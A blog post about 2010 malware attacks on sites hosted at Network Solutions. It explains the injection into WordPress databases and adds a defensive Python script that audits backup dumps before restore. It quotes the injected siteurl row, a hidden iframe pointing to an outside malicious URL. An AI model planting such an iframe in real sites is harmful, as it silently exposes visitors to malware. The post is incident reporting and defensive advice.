Will A Back-Up Save Your Website or Blog After A Malware Attack?

Some of you may have noticed the WF has been down all day. I’m not sure why, but it’s possibly related to a second security attack on Network Solutions’ database center. The first attack occurred on or about April 8, 2010, when a mass infection of WordPress blogs was sustained at the same Network Solutions location.

Here are the details of the April 8 event:

A large number of blogs running WP 2.9.2 were infected with malware. According to Network Solutions, the infection seemed unrelated to themes or plugins, and some of the affected blogs also had WP-admin access blocked to all but a few selected IPs via htpasswd. The sole similarity was that all were on shared hosting at Network Solutions. A Network Solutions spokesperson said all of their WP blogs were affected.

It appeared to be an SQL injection attack, or a sign of larger issues within Network Solutions databases, for the following reasons:

No files were created, so the more common security measures would have offered no advantage. The April 8th attack modified the “siteurl” value in the wp_options table to point to a particular URL. Among other things, this would completely break the layout of the site.

Here’s the code found inside blog databases:

(2, 0, 'siteurl', '<iframe style=\"display:none\" height=\"0\" width=\" 1\" src=\"http://networkads.net/grep/\"></iframe>', 'yes'),

Network Solutions announced today’s attack is the second in two weeks. Of course they’re doing all they can to fix the issues.

This latest attack is widespread and impacts all sites: static HTML and blogs, including WordPress and Joomla. These sites are being infected with iframe injections and encoded JavaScript, plus PDF exploits installed on certain sites. The encoded JavaScript is what makes the iframe injection possible.

This seems to be an attack of wider scope and heightened degree of damage.

Part of the problem for many site owners is that many hosting companies maintain their servers with Network Solutions. So don’t think your site could never be affected if an attack of this nature occurs on someone else’s property.

Network Solutions is now admitting this latest attack is happening at a deeper level. Their restoration attempts have sometimes caused malicious software to be restored because it was backed up in their databases.
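Because a restore can bring the injection back, a backup is worth checking before it is loaded. The script below is an added example, not code from Network Solutions or WordPress: it assumes a SQL dump whose wp_options rows follow the layout of the siteurl row quoted earlier, and the function names and example.com are placeholders.

```python
import re
from urllib.parse import urlsplit

# Options that must hold a bare URL and nothing else.
URL_OPTIONS = {"siteurl", "home"}

# One wp_options row in the layout of the row quoted in the post (assumed):
# (option_id, blog_id, 'option_name', 'option_value', 'autoload')
ROW_RE = re.compile(
    r"\(\s*\d+\s*,\s*\d+\s*,\s*'((?:[^'\\]|\\.)*)'\s*,"
    r"\s*'((?:[^'\\]|\\.)*)'\s*,\s*'(?:yes|no)'\s*\)"
)

def unescape(value):
    """Drop the backslash in front of escaped quotes and backslashes."""
    return re.sub(r"\\(.)", r"\1", value)

def is_clean_url(value):
    """True only for a plain http(s) URL with a host and no markup or whitespace."""
    if re.search(r"[<>\"'\s]", value):
        return False
    parts = urlsplit(value)
    return parts.scheme in ("http", "https") and bool(parts.netloc)

def audit_dump(sql_text):
    """Return [(option_name, option_value)] for URL options that are not clean URLs."""
    findings = []
    for name, raw in ROW_RE.findall(sql_text):
        value = unescape(raw)
        if name in URL_OPTIONS and not is_clean_url(value):
            findings.append((name, value))
    return findings

# Constructed sample dump. Row 2 is the injected value quoted in the post;
# rows 1 and 3 are made up, and example.com is a placeholder.
SAMPLE_DUMP = r"""
INSERT INTO `wp_options` VALUES
(1, 0, 'home', 'http://example.com', 'yes'),
(2, 0, 'siteurl', '<iframe style=\"display:none\" height=\"0\" width=\" 1\" src=\"http://networkads.net/grep/\"></iframe>', 'yes'),
(3, 0, 'blogname', 'A <b>bold</b> blog', 'yes');
"""

if __name__ == "__main__":
    for name, value in audit_dump(SAMPLE_DUMP):
        print(f"DO NOT RESTORE: {name} = {value!r}")
```

Only siteurl and home are checked because other options, such as the blog name, can legitimately contain markup.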

Related actions include Google announcing they are blacklisting as many affected sites as possible.

Tough day at Network Solutions.
